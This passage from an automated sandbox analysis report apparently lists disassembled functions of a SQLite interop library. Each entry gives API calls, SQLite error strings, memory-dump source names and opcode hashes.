                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 23d15b19f530632bef8b6e3b5be1315c69756eda8085ac2a6fb20b68d5529f33
                                                                                      • Instruction ID: 9591b9b25f70314420ee05a1e66c3140e3bf806ffa61c19ff24d38854f6cf7c8
                                                                                      • Opcode Fuzzy Hash: 23d15b19f530632bef8b6e3b5be1315c69756eda8085ac2a6fb20b68d5529f33
                                                                                      • Instruction Fuzzy Hash: 4EF086717006845BEB04DB69DC45D9B7798EF80619F04882AF91ED3B01D631E4148691
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C444D40 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029A87,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C444D68
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C444D61
                                                                                      • misuse, xrefs: 6C444D5C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C444D52
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: b8c4c94938c4267ba454c153d151c3af3404c9c57142ccaffbffc278fb907624
                                                                                      • Instruction ID: 2c664d9723308bf5f96bb5c066ef8d65f926e297cf86ab942005d71ad6d9959a
                                                                                      • Opcode Fuzzy Hash: b8c4c94938c4267ba454c153d151c3af3404c9c57142ccaffbffc278fb907624
                                                                                      • Instruction Fuzzy Hash: F9F0CD707006945BEF14EE79AC09E6637A8AF8076AF004539F92ED7B81EA60E40086C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C40EB00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F69,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C40EB33
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C40EB2C
                                                                                      • misuse, xrefs: 6C40EB27
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C40EB1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: a3385a47a347ba512eefcc1c5bfa00289c64ca2657797e279342c09fc93a4d9e
                                                                                      • Instruction ID: bbfd06b19db6d743638bfe6f55db2e627a41d035a64460b712a15b11b11518b8
                                                                                      • Opcode Fuzzy Hash: a3385a47a347ba512eefcc1c5bfa00289c64ca2657797e279342c09fc93a4d9e
                                                                                      • Instruction Fuzzy Hash: F0F0A436E15618A78714EF69E840C9AF7E9EF98715B10866FEC84A3B40E770A8508BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C444260 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029D49,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C444288
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C444281
                                                                                      • misuse, xrefs: 6C44427C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C444272
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: a1255110b4de5abd3b6b4b966a059372e339f9cfa0368d37b2d11a94b3e37e0f
                                                                                      • Instruction ID: 7f0a24ba001e20241b56e797fb296b491e32b085ba166dcd8cfab2b23186b57f
                                                                                      • Opcode Fuzzy Hash: a1255110b4de5abd3b6b4b966a059372e339f9cfa0368d37b2d11a94b3e37e0f
                                                                                      • Instruction Fuzzy Hash: BCF0243131021453BF08EEAEB810DBA33D8BB807E9724852DF82DDBF82DB20E80142C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B8850 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000143C6,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,00000000), ref: 6C4B8892
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4B888B
                                                                                      • database corruption, xrefs: 6C4B8886
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4B887C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 69a2c658ef622addd48656738bc869d2ceaf597958031f1217f50a9604c42f4a
                                                                                      • Instruction ID: 4e2a750df0882d1c732606459a499891a966a0decd2cfb1847389b9816e60f6f
                                                                                      • Opcode Fuzzy Hash: 69a2c658ef622addd48656738bc869d2ceaf597958031f1217f50a9604c42f4a
                                                                                      • Instruction Fuzzy Hash: 89F0E9729147046BE720DA289D01FA3B3D89B84319F044A6FAC5D93F81FBB2E81492D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F76,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,6C3F374A,00000000,?,?), ref: 6C448658
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448651
                                                                                      • misuse, xrefs: 6C44864C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448642
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 132e79e7a61dc2be69916380d47d988e96af708985af3df1e4a75e0703e6953f
                                                                                      • Instruction ID: 88f5d5918e540f8e5c5b1ba91b5706234966238ca5c88c9e38931ce0a8ed54b7
                                                                                      • Opcode Fuzzy Hash: 132e79e7a61dc2be69916380d47d988e96af708985af3df1e4a75e0703e6953f
                                                                                      • Instruction Fuzzy Hash: 1EF090717003445BEF00EF79AC49D4777E8AB04669B14882AF91DD7B01E630E4108BD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4462D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002964C,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4462F8
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4462F1
                                                                                      • misuse, xrefs: 6C4462EC
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4462E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 909b7917c1d126f95ee22431e9503d43f5f129ae00a50917b20dc3778fec93fb
                                                                                      • Instruction ID: 3515d4c314b1afcadfeee39740b2af4c49ff9a57abe20be96ae85ca9e289008d
                                                                                      • Opcode Fuzzy Hash: 909b7917c1d126f95ee22431e9503d43f5f129ae00a50917b20dc3778fec93fb
                                                                                      • Instruction Fuzzy Hash: 85F05231B0068857FF08EF59AC90CEA3797EBC0768725851EEA29D7B88DB70E80042C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C464590 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023562,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,6C40D2D0,?,6C40CFD4,?,?,0000001C,00000000,6C40D080), ref: 6C4645D4
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4645CD
                                                                                      • misuse, xrefs: 6C4645C8
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4645BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: edcdeda050ece65e10af546ffc347427841d3e10c6e90fe49a84343a7efdfc39
                                                                                      • Instruction ID: 463b94d5cd8bcebeb439cee9e5de7a4afa952542493aeb799a8a9dea598131a1
                                                                                      • Opcode Fuzzy Hash: edcdeda050ece65e10af546ffc347427841d3e10c6e90fe49a84343a7efdfc39
                                                                                      • Instruction Fuzzy Hash: A4E0E53260024DA7EF04EE45FC11D9637569BC0359F10401DBE1C0BB85EB32D52086D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B4710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,6C4B43F9,?,?,000000FF,000000FF,000000FF), ref: 6C4B4733
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4B472C
                                                                                      • misuse, xrefs: 6C4B4727
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4B471D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: cff02d81472ef0ac17e7cd40dce1f796e571f1559d7acb687eaf099554f3bd98
                                                                                      • Instruction ID: 52c3c32e24bedab9d853923ed8c68308820ddca41e3a286fc32ad2cc896dd159
                                                                                      • Opcode Fuzzy Hash: cff02d81472ef0ac17e7cd40dce1f796e571f1559d7acb687eaf099554f3bd98
                                                                                      • Instruction Fuzzy Hash: 03E02B71B0058CB3DB10DD589C46EE733198781359F000258BD1C6F7C1F632D82096D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C40EF70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F85,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C40EF9B
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C40EF94
                                                                                      • misuse, xrefs: 6C40EF8F
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C40EF85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: e5b8df6d9cb9308d01d160212a60a73b39e7d4f5e4119080a3d85929dba1d6b0
                                                                                      • Instruction ID: 93fdf3384e63b29d6a4c9ea82186b508e82bc90d3d9df0a9e0dd8423a15b766e
                                                                                      • Opcode Fuzzy Hash: e5b8df6d9cb9308d01d160212a60a73b39e7d4f5e4119080a3d85929dba1d6b0
                                                                                      • Instruction Fuzzy Hash: F6E0D832E5429C638A00FA686C41CDAB7999BE8216F04476BFD0073B41FBA1646082D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448510 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F95,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C44853B
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448534
                                                                                      • misuse, xrefs: 6C44852F
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448525
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: d4233abd69fe4a621fb480424d4d1824e6d8a94421ea307463d9842c50c02997
                                                                                      • Instruction ID: fa3de5b5daa24c6a6985ba2d1470f623ba6cd3a32ebcd3aa3c7072cfaef94794
                                                                                      • Opcode Fuzzy Hash: d4233abd69fe4a621fb480424d4d1824e6d8a94421ea307463d9842c50c02997
                                                                                      • Instruction Fuzzy Hash: F9E0D832E5065C638A00F97CBC41CDA77989B8921EF04479BFE0CB3B01FBA1655101C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4485A0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F85,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,6C418531,00000000,?,?,00000000,00000000,00000000), ref: 6C4485CB
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4485C4
                                                                                      • misuse, xrefs: 6C4485BF
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4485B5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 0dca557838270283a98e2d004f3122e8dba9dd1a4f149afaa7f6ee4c6504e637
                                                                                      • Instruction ID: ed7e1ef0d50e0d4edf52e2a18de8b1f0dbe4400f40ebd83c9da49fb80b40802f
                                                                                      • Opcode Fuzzy Hash: 0dca557838270283a98e2d004f3122e8dba9dd1a4f149afaa7f6ee4c6504e637
                                                                                      • Instruction Fuzzy Hash: 0DE0D831E5065C639A00FA6DAD41CEAB798CB88219F044B8BFD18B3B42FBA1695046C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C426A50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,6C424F72,?,?,?,?,00000001,?), ref: 6C426A66
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,?,rOBl,?,00000001,?,?,?,?,?,6C424F72,?,?,?,?), ref: 6C426A76
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,?,rOBl,?,00000001,?,?,?,?,?,6C424F72,?,?,?), ref: 6C426A7E
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
